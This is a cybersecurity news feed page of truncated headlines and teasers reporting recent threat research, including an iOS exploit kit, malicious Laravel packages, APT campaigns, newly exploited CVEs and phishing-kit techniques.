Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1
Google said it identified a "new and powerful" exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, Google Threat Intelligence Group (GTIG) said. It's not effective against the latest version of iOS. The findings were first reported by WIRED. "The
 [Link]
New RFP Template for AI Usage Control and AI Governance 
As AI becomes the central engine for enterprise productivity, security leaders are finally getting the green light — and the budget — to secure it. But there’s a quiet crisis unfolding in the boardroom: many organizations know they need "AI Governance," but they have no idea what they are actually looking for. The CISO’s Dilemma: You Have the AI Budget, but Do You Have the Requirements? As AI
 [Link]
Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux
Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems. The names of the packages are listed below - nhattuanbl/lara-helper (37 Downloads) nhattuanbl/simple-queue (29 Downloads) nhattuanbl/lara-swagger (49 Downloads)
 [Link]
APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
Cybersecurity researchers have disclosed details of an advanced persistent threat (APT) group dubbed Silver Dragon that has been linked to cyber attacks targeting entities in Europe and Southeast Asia since at least mid-2024. "Silver Dragon gains its initial access by exploiting public-facing internet servers and by delivering phishing emails that contain malicious attachments," Check Point said
 [Link]
CISA Adds Actively Exploited VMware Aria Operations Flaw CVE-2026-22719 to KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw impacting Broadcom VMware Aria Operations to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation in the wild. The high-severity vulnerability, CVE-2026-22719 (CVSS score: 8.1), has been described as a case of command injection that could allow an
 [Link]
Fake Tech Support Spam Deploys Customized Havoc C2 Across Organizations
Threat hunters have called attention to a new campaign as part of which bad actors masqueraded as fake IT support to deliver the Havoc command-and-control (C2) framework as a precursor to data exfiltration or ransomware attack. The intrusions, identified by Huntress last month across five partner organizations, involved the threat actors using email spam as lures, followed by a phone call from
 [Link]
Building a High-Impact Tier 1: The 3 Steps CISOs Must Follow
Every CISO knows the uncomfortable truth about their Security Operations Center: the people most responsible for catching threats in real time are the people with the least experience. Tier 1 analysts sit at the front line of detection, and yet they are also the most vulnerable to the cognitive and organizational pressures that quietly erode SOC performance over time. The Paradox at the Gate:
 [Link]
Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries
The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks. The new findings come from Team Cymru, which detected its use following an analysis of the IP address ("212.11.64[.]250") that was used by the suspected
 [Link]
AI Agents: The Next Wave Identity Dark Matter - Powerful, Invisible, and Unmanaged
The Rise of MCPs in the Enterprise The Model Context Protocol (MCP) is quickly becoming a practical way to push LLMs from “chat” into real work. By providing structured access to applications, APIs, and data, MCP enables prompt-driven AI agents that can retrieve information, take action, and automate end-to-end business workflows across the enterprise. This is already showing up in production
 [Link]
Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication
Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections. It's advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a dashboard that lets them select a brand to impersonate or enter a brand's real URL. It also lets
 [Link]
Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets
Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of redirecting victims to attacker-controlled infrastructure without stealing their tokens. It described
 [Link]
Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited
Google on Monday disclosed that a high-severity security flaw impacting an open-source Qualcomm component used in Android devices has been exploited in the wild. The vulnerability in question is CVE-2026-21385 (CVSS score: 7.8), a buffer over-read in the Graphics component. "Memory corruption when adding user-supplied data without checking available buffer space," Qualcomm said in an advisory,
 [Link]
SloppyLemming Targets Pakistan and Bangladesh Governments Using Dual Malware Chains
The threat activity cluster known as SloppyLemming has been attributed to a fresh set of attacks targeting government entities and critical infrastructure operators in Pakistan and Bangladesh. The activity, per Arctic Wolf, took place between January 2025 and January 2026. It involves the use of two distinct attack chains to deliver malware families tracked as BurrowShell and a Rust-based
 [Link]
New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel
Cybersecurity researchers have disclosed details of a now-patched security flaw in Google Chrome that could have permitted attackers to escalate privileges and gain access to local files on the system. The vulnerability, tracked as CVE-2026-0628 (CVSS score: 8.8), has been described as a case of insufficient policy enforcement in the WebView tag. It was patched by Google in early January 2026
 [Link]
Google Develops Merkle Tree Certificates to Enable Quantum-Resistant HTTPS in Chrome
Google has announced a new program in its Chrome browser to ensure that HTTPS certificates are secure against the future risk posed by quantum computers. "To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional X.509 certificates containing post-quantum cryptography to the Chrome Root Store," the Chrome Secure Web and Networking Team said. "
 [Link]
More sources will be added in due sources from other feeds.
Sentinel Footer
© 2022 QFINITY (Pty) Ltd. All rights reserved. Reg# 2020/503529/07. VAT#: 9066 648 263